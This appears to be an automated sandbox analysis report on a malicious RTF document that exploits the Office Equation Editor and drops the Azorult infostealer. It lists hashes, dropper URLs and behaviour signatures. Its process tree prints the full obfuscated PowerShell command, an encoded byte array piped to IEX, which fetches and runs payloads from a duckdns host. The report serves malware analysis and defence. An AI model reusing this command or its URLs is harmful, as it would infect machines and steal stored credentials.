Analysis

  • max time kernel
    62s
  • max time network
    67s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    10-07-2020 10:58

General

  • Target

    usa (1).doc.rtf

  • Size

    1.6MB

  • MD5

    2bb2d4cd00b57d4f9a23cf1f47235dcf

  • SHA1

    18e0c460dde1db288f547cc8a6265bf365587ebb

  • SHA256

    6d831aaa4b8ee1c41b519dad3a7de26c9cae4d71786609a178a62560697c4078

  • SHA512

    4753910b4bccef05872fdb3b10f837e26b609a53845bd64155b826d1c9e9027f8fbadb953286404bd8ead3720f6db5137dad28a40d8de19ea356af79c14dea46

Malware Config

Extracted

  • Language
    ps1
  • Source
    ps1.dropper
  • URLs
    http://usa24i3.duckdns.org/usfold/109.mt
    http://usa24i3.duckdns.org/usfold/us3459.m98

Signatures

  • Checks processor information in registry (2 TTPs, 2 IoCs)

    Processor information is often read in order to detect sandboxing environments.

  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious use of AdjustPrivilegeToken (41 IoCs)
  • Suspicious behavior: EnumeratesProcesses (7 IoCs)
  • Launches Equation Editor (1 TTPs, 1 IoCs)

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Reads user/profile data of web browsers (2 TTPs)

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Reads data files stored by FTP clients (2 TTPs)

    Tries to access configuration files associated with programs like FileZilla.

  • Suspicious behavior: AddClipboardFormatListener (1 IoCs)
  • Suspicious use of SetWindowsHookEx (2 IoCs)
  • Suspicious use of SetThreadContext (1 IoCs)
  • Checks for installed software on the system (1 TTPs, 30 IoCs)
  • Drops file in System32 directory (1 IoCs)
  • Process spawned unexpected child process (1 IoCs)

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blacklisted process makes network request (1 IoCs)
  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Reads user/profile data of local email clients (2 TTPs)

    Email clients store some user data on disk where infostealers will often target it.

  • Suspicious use of WriteProcessMemory (33 IoCs)
  • Loads dropped DLL (16 IoCs)

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\usa (1).doc.rtf"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:112
  • C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:928
    • C:\Windows\SysWOW64\CmD.exe
      CmD.exe /C cscript %tmp%\usa.vbs A C
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1072
      • C:\Windows\SysWOW64\cscript.exe
        cscript C:\Users\Admin\AppData\Local\Temp\usa.vbs A C
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1512
        • C:\Windows\SysWOW64\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay
          4⤵
            PID:1828
          • C:\Windows\SysWOW64\svchost.exe
            C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay
            4⤵
              PID:1868
            • C:\Windows\SysWOW64\svchost.exe
              C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay
              4⤵
                PID:1884
        • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
          Powershell $5C75D5D41AFE0AC5C76840D685E175C8325BABBAEFD4F0BBAD4E26AD6BC76BAE184=@(100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,102,106,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,35,35,35,35,108,111,97,100,83,116,114,105,35,35,35,35,103,39,46,114,101,112,108,97,99,101,40,39,35,35,35,35,39,44,39,110,39,41,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,58,47,47,117,115,97,50,52,105,51,46,100,117,99,107,100,110,115,46,111,114,103,47,117,115,102,111,108,100,47,49,48,57,46,109,116,39,41,124,73,96,69,96,88,59,91,66,121,116,101,91,93,93,36,102,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,35,35,35,35,108,111,97,100,83,116,114,105,35,35,35,35,103,39,46,114,101,112,108,97,99,101,40,39,35,35,35,35,39,44,39,110,39,41,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,
104,116,116,112,58,47,47,117,115,97,50,52,105,51,46,100,117,99,107,100,110,115,46,111,114,103,47,117,115,102,111,108,100,47,117,115,51,52,53,57,46,109,57,56,39,41,46,114,101,112,108,97,99,101,40,39,42,38,94,37,39,44,39,48,120,39,41,124,73,96,69,96,88,59,91,72,97,110,100,108,101,82,117,110,93,58,58,65,115,121,110,99,104,114,111,110,111,117,115,40,39,103,112,117,112,100,97,116,101,46,101,120,101,39,44,36,102,41);[System.Text.Encoding]::ASCII.GetString($5C75D5D41AFE0AC5C76840D685E175C8325BABBAEFD4F0BBAD4E26AD6BC76BAE184)|I`E`X
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetThreadContext
          • Drops file in System32 directory
          • Process spawned unexpected child process
          • Blacklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:1776
          • C:\WINDOWS\syswow64\gpupdate.exe
            "{path}"
            2⤵
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Checks for installed software on the system
            • Loads dropped DLL
            PID:2024

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/1512-6-0x00000000027A0000-0x00000000027A4000-memory.dmp

    Filesize

    16KB

  • memory/2024-9-0x0000000000400000-0x0000000000420000-memory.dmp

    Filesize

    128KB

  • memory/2024-7-0x0000000000400000-0x0000000000420000-memory.dmp

    Filesize

    128KB